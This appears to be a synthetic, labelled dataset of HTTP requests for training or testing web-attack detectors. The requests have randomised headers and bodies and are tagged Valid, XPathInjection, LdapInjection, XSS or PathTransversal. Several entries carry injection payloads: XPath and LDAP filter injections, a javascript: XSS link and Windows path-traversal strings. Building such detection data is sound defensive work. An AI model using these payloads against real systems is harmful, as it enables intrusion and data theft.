PUT /rkC5/LlTiurn/emauG1Cy3.@G9z_L7UV3/BK/-KGU.eVIvXnGJrh/tluoiojcytp/72XZgYEjfRMifC0uDsbr/iondj8dmhsterAi/tPZSKlPi_/19OeTcsLQXDuqdyFjDE/3kmeta@documentx5.aspx? HTTP/1.0
Content-Length: 230
Content-Language: uen723hy,tj
Content-Encoding: gzip
Content-Location: http://www.cNrobnft.fr/huhAe/tVpnhndo.gif
Content-MD5: dGRhQXJydWZiZnRuYWFjdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Sep 09 12:25:31 UTC
Last-Modified: Mon, 18 May 09 15:31:38 CET
Host: www.assrs8e.st:4119
Connection: too7di2
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.3, deflate
Accept-Language: *
Cache-Control: max-age=52
Client-ip: 56.166.151.5
Cookie: 20ia=v$;pAyTdmme8=a h g;ae7at0odfrll=t$;CkGLcopyallGhQM1=uyebawoldatr;mncy3t=c2Jr787C;I-binMACNmknEO=ak
Cookie2: $Version="628"
Date: Tue, 12 Sep 06 16:56:56 CET
ETag: W/"qmkQusRfs2p4B8o5H"
Expect: 100-continue
From: dbae4ti@tmraxarsak.gov
If-Modified-Since: Fri, 21 Sep 07 19:30:12 CET
If-Unmodified-Since: Wed, 13 Sep 06 09:32:28 GMT
If-Match: "X6bPykH60nT2Z7@TwckC"
If-None-Match: "4Z-QdmEQhURDJqt-1gU"
If-Range: *
Max-Forwards: 37
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic dG9hZm9vcm46aW9yRWJwdXk=
Authorization: Digest realm
Range: 708-,54-
Referer: http://jWs6en.net/weestg/psrt/otleai2/tjhohoi.php4
TE: chunked
Trailer: Range
User-Agent: Mozilla/6.9 (Windows; U; Win98 2.1; cu-lg; rv:1.7.3) Gecko/44522328
UA-CPU: 68000
UA-Disp: 469,437,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 302x0187
Via: 6.1 www.ets1i.gif:7600, tcr8m/3.2 www.enrr.htm, in2O/8.1 193.50.191.123
Transfer-Encoding: eestrt; ar9ewte=fiaroa8
Upgrade: adhoe/1.9, tFp/6.3, Sodh/1.5, htccnv/7.0, Teeeqf/9.6
Warning: 649 203.53.186.124 "goDwmmazMte" "Fri, 23 Sep 05 06:11:33 UTC"
X-Forwarded-For: 38.119.21.192
X-Serial-Number: 95461590331
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

k5475=7689&efnEes0ie0nkqif=naiEorusrtwindow.openformslcth&he=771271&il1jemneKeai2F=802&1EsZdocumentuprocessing-instructionVs=T9l&DeictNc1nonja=ferex&vkfdcEtdsn=078&E36atdhxlnasg=T~etrg1/iioyl&.j8GBGe=0he&o9yics7yxfvhte=41&ie=3

End - Id: 6840
Start - Id: 10478
class: Valid
GET /qCf/txgg-kobXL_3TSS2G4/uEfE_qM6/5spcRHQ_/0Wb9a.shtml?JaaowtihsdreXo=qlhAw%3A%40osawsa%3A&endbsudind=ph.HfQD0lhT&eoAgceiasmia=tum&im5fenon3q=1783252748&e7ah8kyR7uLt=style+einm%40Ms&ie=gi5Qu3xuRncD HTTP/1.0
Host: www.hqtL.st
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: vs-9n;q=0.3, rLn5tk-mhn;q=0.9, ao-geseos
Cache-Control: only-if-cached
Client-ip: 234.79.172.175
Cookie: eO=i(op;derotUHnuea=s;1xofi=mQfioZ2
Cookie2: $Version="93"
Date: Mon, 03 Oct 05 21:13:00 CET
ETag: "l4MqmcenoI2jHZrUVD9s"
Expect: 100-continue
From: Tntn@cwaeo7.gov
If-Modified-Since: Sat, 19 Sep 09 12:43:10 UTC
If-Unmodified-Since: Fri, 04 May 07 03:48:29 UTC
If-Match: *
If-None-Match: "TdZHNhvwFpp5fhMyHvQu"
If-Range: Fri, 12 Jan 07 21:25:40 GMT
Max-Forwards: 4395
MIME-Version: 1.0
Pragma: Teoprcaf=0vwj
Proxy-Authorization: ahrg eanceorA=Hkshco8
Authorization: NTLM eWVoYXVodFNlTmVzbGN0ZW5wVERlY3E2aXJuZmJ1bmlyclNuc3F5ZWZo
Range: 5-1,96994-671,51284-
Referer: /oihyhbr/adex0/titas.asp
TE: trailers,trailers,chunked;q=0.2
Trailer: Via
User-Agent: Mozilla/1.9 (X11; U; Open BSD i586 6.1; ce-oe; rv:2.5.9) Gecko/54765181
UA-CPU: StrongARM
UA-Disp: 4955,848,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 747x1672
Via: 8.5 45.166.209.26, EAdnc/8.1 105.40.66.89, FTP/4.3 www.bihlrie.css
Transfer-Encoding: gzip
Upgrade: hpr/1.7, 2wn/2.6, lso/0.7
Warning: 236 www.oadmow.htm "dwuNt7" "Fri, 01 May 09 20:56:35 UTC"
X-Forwarded-For: 153.53.63.108
X-Serial-Number: 23963701086419023023
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10478
Start - Id: 7405
class: Valid
POST /ogYxDd8/iZkE88vZwoChbYN/cAIgplI6/oko5_qV/se.nsf? HTTP/1.1
Content-Length: 194
Content-Language: y,sr2nHetm,e8spn
Content-Encoding: gzip
Content-Location: http://www.aol7fXeh.gov/o1yiaq/feihorhp/latba/Eltae/JADQdoe.pl
Content-MD5: ZWpqbnJkYW5ldWFndGQ1YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Feb 10 07:17:00 UTC
Last-Modified: Tue, 06 Nov 07 15:11:47 GMT
Host: www.Reueccst6i.org
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.4
Accept-Encoding: *
Accept-Language: oOooteo-nl;q=0.6, yviysS0q-eeme95;q=0.5, ln-EenJee7;q=0.8, elo-tbfisgs, awouyeeT-d
Cache-Control: only-if-cached
Client-ip: 18.26.124.162
Cookie: uhe=nu e;Stfeaee1=t5rmr;trr=0132513;hkab=3209240
Cookie2: $Version="6"
Date: Fri, 28 Oct 05 02:29:03 GMT
ETag: W/"OeA1l2a7G9IFPnSwqc3X"
Expect: 100-continue
From: p4dremdP@srvk.ch
If-Modified-Since: Sun, 12 Feb 06 10:37:06 CET
If-Unmodified-Since: Sat, 10 Jan 09 15:20:34 CET
If-Match: "cfBFCc-e@w7ZAJlVrXo"
If-None-Match: *
If-Range: "@0LDE0UrrwzPRqq"
Max-Forwards: 958
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: asue bpcdhTC=a83idrez
Authorization: ealun2 Lsertja4=0usur
Range: 12-25753
Referer: /dSoaHor/wblut8d.png
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.3 (Windows; U; Windows NT 3.8; ih-so; rv:2.2.9) Gecko/45896247
UA-CPU: StrongARM
UA-Disp: 621,301,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9649x7067
Via: 2.4 www.uoby7.jpeg
Transfer-Encoding: nctp
Upgrade: arsv/7.3, gzM/6.6, neme/1.8, raLOwa/5.7
Warning: 940 www.wqeIE.jpg "7sitrenq" 
X-Forwarded-For: 248.139.237.35
X-Serial-Number: 34150239998
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tpeelbqriftBgOe=oldal6eu&RsCDqR30=205&rEiaiqnfipcc=3817&nwrjsese=r1H4J&tsh1eyqb9ttanio=29463703&n0gfmeeHi=hbH&ebeo=tf%uvpEfcrqasei)andm&lajnIinkeeALz=d9H42Mm_d&a0iermtiyArti=k+ sgYTic9wyqN

End - Id: 7405
Start - Id: 48576
class: XPathInjection
POST /iPGhigd1/v0/mscoryrSnn/7uslnipvuuooip9er/wesyloegagxzgly/el/hCme6w0tsaxrtu/4sp4sT4tOe.pl? HTTP/1.1
Content-Length: 203
Content-Language: 3,t,ctStsn
Content-Encoding: compress
Content-Location: http://t8baAn.fr/92ivre/yD11Enar/heon/lszfu3.msf
Content-MD5: ZVVwdWhyc25vbHNsYWVyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Apr 06 19:02:36 GMT
Last-Modified: Sun, 11 May 08 21:32:25 CET
Host: www.Limdenx6D.biz
Connection: eol64
Accept: text/*, video/quicktime;q=0.2, audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=36456
Client-ip: 163.106.24.253
Cookie: tdhsn=372;Gswp-uxI=ecopy%where;gy1UXbqDkhavingaU=4
Cookie2: $Version="91"
Date: Wed, 23 Jan 08 11:21:29 GMT
ETag: "GSCXoNh2vkhzld6.WL"
Expect: iJvsn=ronjlII
From: tatnungw@cltshcrl.be
If-Modified-Since: Thu, 19 Nov 09 06:23:42 GMT
If-Unmodified-Since: Sun, 15 May 05 19:01:21 GMT
If-Match: "EezgoY@xNeRCtugFgwNI"
If-None-Match: *
If-Range: Thu, 16 Oct 08 24:50:23 CET
Max-Forwards: 77
MIME-Version: 2.8
Pragma: rsiirpOc='9W'
Proxy-Authorization: Digest nonce
Authorization: Digest qop=auth-int
Range: 89-706195
Referer: http://nte6.gov/ctierwso/9tiirea/ibae/DeeeoC.tiff
TE: deflate;q=0.1
Trailer: Date
User-Agent: nmoas (anBZMBh9H)
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 316x0903
Via: HTTP/4.0 www.iynhoepn.jpg, FTP/1.9 www.Tomtrjy.gif, HTTP/2.7 53.239.190.128:3965
Transfer-Encoding: hYtmiN
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 315 www.ao85sn.css "tafdeoll9t" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

wdeea=43720 or    1<     fhm/tssp/Vvtii/child::text()[position()=37] or  9='] | /* | /foo[bar='&Dsock_streamRnode5Y=3217&oe8i81=0IX&li=lsmambcprgnvbscriptraz

End - Id: 48576
Start - Id: 21765
class: Valid
GET /8weaaeoerZ/neE/Hgco8n5p/eeidetwsclfeerDp6e.pl?hlox=ndropsF HTTP/1.1
Host: 218.38.244.140
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: cp-936
Accept-Encoding: *;q=0.4
Accept-Language: 6zI-ge0av, Dnooejlo-nl2;q=0.9
Cache-Control: no-store
Client-ip: 255.171.87.96
Cookie: shitr=R or=e;Psn9ehttdnu=061;mvd=wVK9;e5andardKcrbea=89326;eugADtl7kM=8PP;caEevcAYGistvi=571
Cookie2: $Version="772"
Date: Sun, 22 Nov 09 08:26:23 CET
ETag: W/"r_V88P2JeaKByNWW7rSY"
Expect: sh2lodw
From: twiato@ahnEode.ch
If-Modified-Since: Mon, 22 Mar 10 12:12:49 CET
If-Unmodified-Since: Mon, 11 Jul 05 18:43:12 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Sep 04 16:55:29 CET
Max-Forwards: 7
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: Basic bnRhbnc3OmV2ZWRl
Range: 4-,-68,1577-
Referer: http://eydsdTen.org/nnlte/rurnfcdr.js
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 1.7; dr-6h; rv:4.9.3) Gecko/35994467
UA-CPU: PowerPC
UA-Disp: 6826,0757,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9055x3634
Via: 6.4 www.oaetui.shtml:6082, FTP/3.8 59.171.170.128, 3.3 119.201.11.188:1566
Transfer-Encoding: deflate
Upgrade: shba/5.1, oaeihe/1.1, eb6t/5.9
Warning: 597 www.rnilf.jpg "annEhbbnde2eoenodht" "Mon, 26 Dec 05 11:59:16 UTC"
X-Forwarded-For: 221.81.223.145
X-Serial-Number: 229103908276446605
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21765
Start - Id: 25728
class: Valid
GET /dor3rnoDitn/apiSZUYW/IjstyleQm/i./iilRuyo/ainU@psZy1z5F7rC/asacr/a-O6/Eweotb1tislrN.mspx?Pttfh=t6m&tf=951&OidatefNnlaj=33&tpjretH=8552524&3pnsydiaE=ehrp%3Drx HTTP/1.0
Host: www.eyxOit.gov:184
Connection: Ooyat
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oDi-bNtrr, epac-sra1ahs;q=0.3, dai8zr6-4oe
Cache-Control: no-store
Client-ip: 74.235.173.225
Cookie: ralNto5Rc9irn9m=6647
Cookie2: $Version="766"
Date: Sat, 13 May 06 19:39:23 CET
ETag: W/"Xtgr-G7kiBsHZKXyq"
Expect: rs6arew6
From: xschuvm@deiWYe.gov
If-Modified-Since: Thu, 11 Oct 07 23:58:50 GMT
If-Unmodified-Since: Sun, 08 Mar 09 14:58:13 UTC
If-Match: "NkVhB294tqE-OZMuU2Xn"
If-None-Match: "UBQVwlDQuLycCeLn"
If-Range: "hhZL@wS6zSOIBr21A.7l"
Max-Forwards: 05
MIME-Version: 0.2
Pragma: eotoc='a'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic YmloYTpEaW5hMQ==
Range: -1,27054-,1-75962
Referer: /4ahhi/4arhntro/eiaacht/eSel/tjoq.bin
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: hxU5Mh-9 http://www.rpmd.gov
UA-CPU: MIPS
UA-Disp: 7894,3200,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5684x8166
Via: 5.8 25.100.108.166
Transfer-Encoding: compress
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 612 www.1jatrt.shtml "npmzRiead4" 
X-Forwarded-For: 4.231.239.216
X-Serial-Number: 64360194
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25728
Start - Id: 8226
class: Valid
GET /oc2cHN8PlEoZ@kfqqbSY/mr/Yk..aG/z8avk.pl?fsi3mlitl=3zhpseoqa&nkvd0uCbsggFde=5488&g0@yG_0TJQ=wZEd_9XEfs5&YsgDeem=+%29Nhr&jourfhttLuhhett=Npaysnseer&ndfEra0a4teltc=hY_xdZ2&aarnioh=gsaelilt33tvarby0eal HTTP/1.1
Host: www.7sslbc.be:28
Connection: close
Accept: application/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 30.130.64.241
Cookie: aZv-B14=53604;ANrnnanVee6bot=fCanaiaLeenen ;seocodoe3tieeMi=rVfBX39jYs;zdftaAlagiE=ehvfcvj1ys2
Cookie2: $Version="869"
Date: Thu, 17 Mar 05 12:28:02 GMT
ETag: W/"6Yal4L@TVxr.WUoqs"
Expect: 100-continue
From: naraez2@nbaeit.cz
If-Modified-Since: Fri, 04 Mar 05 07:37:54 CET
If-Unmodified-Since: Fri, 11 Feb 05 10:33:35 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Nov 06 18:16:57 UTC
Max-Forwards: 1669
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic dWVjaGFvOjBpeWFl
Authorization: Digest algorithm=MD5-sess
Range: -164292,-5
Referer: /LWEebor/8bchao8/mlbetdh/adna/oas1ni.zip
TE: trailers,gzip,trailers
Trailer: Pragma
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 2.1; ig-iA; rv:9.8.1) Gecko/74206668
UA-CPU: Sparc
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 794x905
Via: 2.4 www.Ihc0dhm.html, 4.6 www.7oYebkb.gif, 7.1 www.pweciiIe.html
Transfer-Encoding: gzip
Upgrade: ib6Ex/5.7, aZse/0.7
Warning: 252 www.aUro.css "eearwsr7" 
X-Forwarded-For: 176.93.53.162
X-Serial-Number: 9806136470509307613
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8226
Start - Id: 37200
class: LdapInjection
GET /nlMcxgKXW.V/window.openXphp.shtml?7zU4AxOH4oQ=2Lfv&hi4tHaa=%29+%28+++%7C+++%28displayName%3Dhad*%29++++%28name+%3D++++had*+%29%28++++mail%3Dhad*%29&t7TedGo0wyet=t.Y0da HTTP/1.0
Host: 246.83.229.50
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rgth-v;q=0.1, ass-mr0on6et;q=0.2
Cache-Control: no-cache
Client-ip: 91.239.79.80
Cookie: Esoclanua=etrrmneOnttqgeia;access_logUvsC4M9y=0h;3an5ltrtnjae=i;cse=54834;bn=3;ggliwe8sifo7=n-cqsc
Cookie2: $Version="0"
Date: Thu, 07 Jun 07 10:08:11 CET
ETag: "jWUARu-3c1x8dSRpo7"
Expect: 100-continue
From: narlmrwa@Ygb8ru.st
If-Modified-Since: Wed, 22 Oct 08 10:17:17 CET
If-Unmodified-Since: Sat, 04 Jul 09 09:00:24 GMT
If-Match: "UKV5qTybQXfzRvhAF_"
If-None-Match: *
If-Range: Fri, 24 Jul 09 17:49:44 CET
Max-Forwards: 3
MIME-Version: 2.5
Pragma: GARtr=iQwat
Proxy-Authorization: VeVred yOevl=nQeapl7w
Authorization: Digest uri=/chnr.sh
Range: 605-286224
Referer: http://www.Ouct.be/nose/ayaad/nseah/v3ap/clierH.aspx
TE: gzip;q=0.6
Trailer: From
User-Agent: Mozilla/6.7 (compatible; nzpta; Unix; hhTavpz; hrhnrcixrd; hwmz)
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0874x8291
Via: 0utfcq/8.1 121.146.79.83:1604, FTP/6.1 www.aQ1Aesht.css:144, FTP/4.7 27.138.69.23:311
Transfer-Encoding: deflate
Upgrade: resPct/8.2
Warning: 861 www.yirfos.jpg "e6bssmnatemnd" "Mon, 24 Nov 08 01:28:57 CET"
X-Forwarded-For: 209.47.70.154
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37200
Start - Id: 26028
class: Valid
GET /atotzcyetAifftiP0ds/nkipJ/li7HPv2EVZUQJf6MZx/eoesgs0fdro1enltntf/ea/sTi/todpzNmOuOx5lX9G6.php?Gz=frb%401lib8sdlrnZE&6d=519630&Tsg0msarsipep2=73828&pupcafh=ONait&catX@H_inputchild=1E9onmiqnu%25aw&totbw3tn=5bhtpassr9tEs&w2ftues=uescriptn++erelt&lpmhwnoetd=naci HTTP/1.1
Host: 242.35.215.209
Connection: bilbna
Accept: text/plain;q=0.1
Accept-Charset: windows-1258;q=0.1, x-mac-ce
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 34.105.255.188
Cookie: bsnhiutddwt=jfCQGQu_A7
Cookie2: $Version="7"
Date: Sat, 14 Jan 06 17:03:22 UTC
ETag: "7wUBl2V0wMQ5Eg3Es"
Expect: 100-continue
From: 3seat2ct@Cn4ntSeii.com
If-Modified-Since: Thu, 03 Jan 08 18:43:53 GMT
If-Unmodified-Since: Fri, 15 Jun 07 22:21:21 GMT
If-Match: "0gwAxE2y6DgnH4Swq"
If-None-Match: *
If-Range: Wed, 03 Oct 07 04:57:15 CET
Max-Forwards: 44
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic bmJPbWVvc2g6Y2VXbjVvNw==
Authorization: Digest algorithm=MD5-sess
Range: -13,874-810484,763-09710
Referer: /rce6o/amctrw/dLts/nl7iel/o8ELts.jpeg
TE: deflate
Trailer: Warning
User-Agent: Mozilla/2.5 (X11; U; Unix 6.3; e4-ap; rv:4.7.0) Gecko/06181139
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4161x5305
Via: 4.6 53.57.49.138:2394, FTP/6.4 www.UaluC9e.js
Transfer-Encoding: rAgte
Upgrade: lr6nji/0.6, no2fo6/1.2
Warning: 936 www.ab27.html "s2azr0" 
X-Forwarded-For: 212.160.180.28
X-Serial-Number: 6743288486222977
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26028
Start - Id: 47743
class: XSS
GET /eseKaoad/Teheti/eTirWTfunJ5G7pVOY/peytedrbftesef/hseb9akzehIc3twem5.bin?tqRrhalsht0ei7c=kZojkkwp-otl&tirertan6z2=thm4oclahqhoj5&mRalfc=%3Clink+++++rel+++%3D++++%22stylesheet+++++%22++href+++%3D++%22javascript%3A+++%5Balert+++%28%27hhgn%27%29%3B%5D%22++%3E&ueneiood=%5C+&urptAst=EiaA8rhm&E9whmiltasoiten=63015&fromCRZUG=2Jc2lZZ3IsVu&n4es0o6eLt1d=rKIZPCUJz&n4rossrerSyetbt=ee&i9=qKc5i0gx&ssp=479909077 HTTP/1.1
Host: 196.180.50.204
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1250;q=0.7, x-mac-ce, koi8, isiri-3342
Accept-Encoding: *
Accept-Language: *
Cache-Control: 0Eo=Tou
Client-ip: 58.135.32.75
Cookie: unionQq8K=05794174
Cookie2: $Version="2"
Date: Mon, 02 Aug 04 15:54:24 UTC
ETag: "B3GtyHgDy1kQ_H-."
Expect: asn70
From: m8jEe@asesn.biz
If-Modified-Since: Wed, 31 Jan 07 21:39:37 UTC
If-Unmodified-Since: Wed, 30 Aug 06 06:57:30 GMT
If-Match: *
If-None-Match: "SsWaTrNxWk42BiGRZEf"
If-Range: *
Max-Forwards: 9379
MIME-Version: 7.7
Pragma: ri=3O
Proxy-Authorization: Basic czZVbmRodDphdW5zdG9u
Authorization: dcyei bKeelhtg=geEmsh
Range: -887125,6715-3229
Referer: /bpstef.js
TE: chunked;q=0.1,trailers
Trailer: Date
User-Agent: Mozilla/8.4 (Windows; U; Windows NT 7.9; ma-da; rv:5.2.8) Gecko/21848541
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0710x100
Via: 9.9 170.100.236.77:628, todirp/8.1 146.121.242.41:84781, FTP/9.9 www.Ena9it.js
Transfer-Encoding: identity
Upgrade: 1eEw/6.0
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 198.120.124.208
X-Serial-Number: 08031328367563648957
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47743
Start - Id: 38810
class: LdapInjection
GET /0emstn.exe?cefwa=+prc%26%7Ehdoeusock_stream3n7&ipreopO=0439&WFgroup byE%uQGn@N=4358&ar74oh4erdroiue=%29+%28+++%7C++++%28ftb%3Doa7*%29&o8cdnz=Nnnl%25&Fvoeumadr=%40%3D1e&oleYW4=2%26&arints=10050 HTTP/1.1
Host: www.ealnr.gov
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.9
Accept-Encoding: gzip;q=0.7, deflate, compress;q=0.8, compress;q=0.9
Accept-Language: c-cu;q=0.8, eoVnbb-ihlEho;q=0.0, b-GyaeLO;q=0.3, sBln-r;q=0.2, dl0ah-i;q=0.8
Cache-Control: no-store
Client-ip: 103.147.207.153
Cookie: td2aoxOer=847
Cookie2: $Version="19"
Date: Thu, 28 Dec 06 10:04:17 UTC
ETag: "954BYt15GW0-QKluibg"
Expect: stgenha=alean
From: r5dntkrl@nt5eetn.it
If-Modified-Since: Thu, 15 Nov 07 10:00:42 UTC
If-Unmodified-Since: Sat, 24 Apr 10 09:46:22 UTC
If-Match: "TNqQMRopKqO_0akyLY"
If-None-Match: *
If-Range: *
Max-Forwards: 199
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: NTLM bWgxaWNpbXFuYWFkbXRvbHRoZU9uaVNqbGlyZWhFbmV0Y3hsb2V0dGlZMnh1
Range: 65399-30
Referer: /t4jgiM/etaeubpk.swf
TE: deflate;q=0.3,trailers
Trailer: Pragma
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 5.0; Ee-ra; rv:0.3.4) Gecko/38956034
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: 9.9 134.21.37.89, 7nr/4.1 www.aWsu5Ryu.jpeg, FTP/0.4 www.estts.png
Transfer-Encoding: Ytk0
Upgrade: 4il/3.9, tonrt/7.0, dpxy/9.7, 9er/8.7
Warning: 692 13.160.132.116 "ndPjlas9soo" "Thu, 18 Sep 08 13:51:21 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38810
Start - Id: 5881
class: Valid
PUT /i_9lqqgFLfcePa9kT6g/tcVTh-jemgU/8nqhuogdDafhEtmo/0linkHskb.ityunioncopyo/iq/lh1@OIG/rpa/SUj@PYn8_Pmochakmxml/rzVjR8OUFGk4yGS_qvw.css? HTTP/1.1
Content-Length: 10
Content-Language: ez7bAaEt,3duEha,io
Content-Encoding: compress
Content-Location: http://shasgom.be/2smetia/eecm/xo5rte/iufrl3q/edroc.gz
Content-MD5: Zm41VWVzOWRpemFoZW1taA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Nov 07 14:54:24 CET
Last-Modified: Wed, 09 Jan 08 02:31:57 GMT
Host: www.2ndvgtEzop.ch
Connection: close
Accept: audio/basic;q=0.0, audio/basic
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 99.15.144.135
Cookie: mhEsaeen78ri=hie;h6Lprocessing-instructionhMevalbp=eE4J0;i1nA7=nzEinfHh0lrem;ws=p
Cookie2: $Version="0"
Date: Mon, 13 Nov 06 18:50:16 GMT
ETag: W/"PIT7baSOcooW8aoQ-U"
Expect: tnaiyco=a9mseo;tiromLcu
From: mOr4g@othliluhnF.org
If-Modified-Since: Tue, 05 Oct 04 18:16:15 CET
If-Unmodified-Since: Wed, 28 Apr 10 17:47:45 UTC
If-Match: "49KXOp5ToRK0NonMum9"
If-None-Match: "j3tnNlwXiduhQ4e0A"
If-Range: *
Max-Forwards: 991
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest qop=e26t8s
Authorization: Digest realm
Range: 8-
Referer: http://www.nenlIhu0.cz/eUma/oeyaalee/cset/hejhe4mh.asp
TE: gzip,trailers,deflate
Trailer: If-Match
User-Agent: 0rIAyaXAp http://www.baln.org
UA-CPU: x86
UA-Disp: 4516,8508,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 621x973
Via: 7.3 209.77.96.177
Transfer-Encoding: deflate
Upgrade: 1ncfmr/8.6, ihjw6/9.1, 6be57y/1.3, nouoie/8.5, sehtoe/9.2
Warning: 170 www.oseryN.jpg "sydinifctYn" "Mon, 28 Aug 06 23:59:58 UTC"
X-Forwarded-For: 229.92.118.231
X-Serial-Number: 9871025244196928372
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pz0er=hktl

End - Id: 5881
Start - Id: 45984
class: PathTransversal
POST /wKqKD8WG_/gmo1hyaWtinttsiaeDy/nMghrtUhxQG5xuxRxlv/oD45/zxdzA5Astyleot5rcpc.v/access_log-XOyCchildi/oetddtAdiEsyzpr85ela/hR9O/eungwa5alahloeNsieuT/i6VtCY.CEKaS.aspx? HTTP/1.1
Content-Length: 39
Content-Language: 3oewdg,8rfe,tdEuw
Content-Encoding: compress
Content-Location: http://vagij4jc.org/rnhRna/tnDoaiO.rar
Content-MD5: bjVzaGNzZHRySWRuc29hcg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 Jul 06 05:08:02 GMT
Host: 110.211.35.83:86
Connection: nrhns
Accept: audio/x-wav, audio/x-wav, application/*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: ..\..\..\..\..\..\..\..\..\WINNT\system.ini
Accept-Language: e:\windows\boot.ini
Cache-Control: max-stale
Client-ip: 250.34.233.65
Cookie: hsTi=cmdces7a~Telf+bt;se2au4o8v=ta
Cookie2: $Version="181"
Date: Sat, 30 Jan 10 19:23:53 UTC
ETag: "iL.lhMF7FSpD_jLo"
Expect: 100-continue
From: nuteet@ahiie.fr
If-Modified-Since: Wed, 28 Mar 07 11:33:25 CET
If-Unmodified-Since: Fri, 16 May 08 02:39:27 UTC
If-Match: "_md@BtjNJW6BKvBG"
If-None-Match: *
If-Range: Tue, 22 Apr 08 06:11:22 GMT
Proxy-Authorization: eelo uasuthoo=eyfL
Authorization: Basic U25tZWhhOkljNzQ=
Referer: /lwjt/oosU0gd/edndo.php4
User-Agent: Mozilla/6.7 (X11; U; Open BSD i386 9.7; pn-x9; rv:6.3.3) Gecko/42808383
UA-Pixels: 705x843
X-Serial-Number: 9739986

ji1neietDms4a=in9lIwimlenau&etiNr=23080

End - Id: 45984
Start - Id: 34926
class: Valid
POST /eaad7/bkQ7w9x_zU/thR8bTu3twhndio0snw/ylth5ea0/nBxq@2hqRnLjje/i-OpEohJ/wPseuG.php4? HTTP/1.1
Content-Length: 323
Content-Language: Cartxaee
Content-Encoding: identity
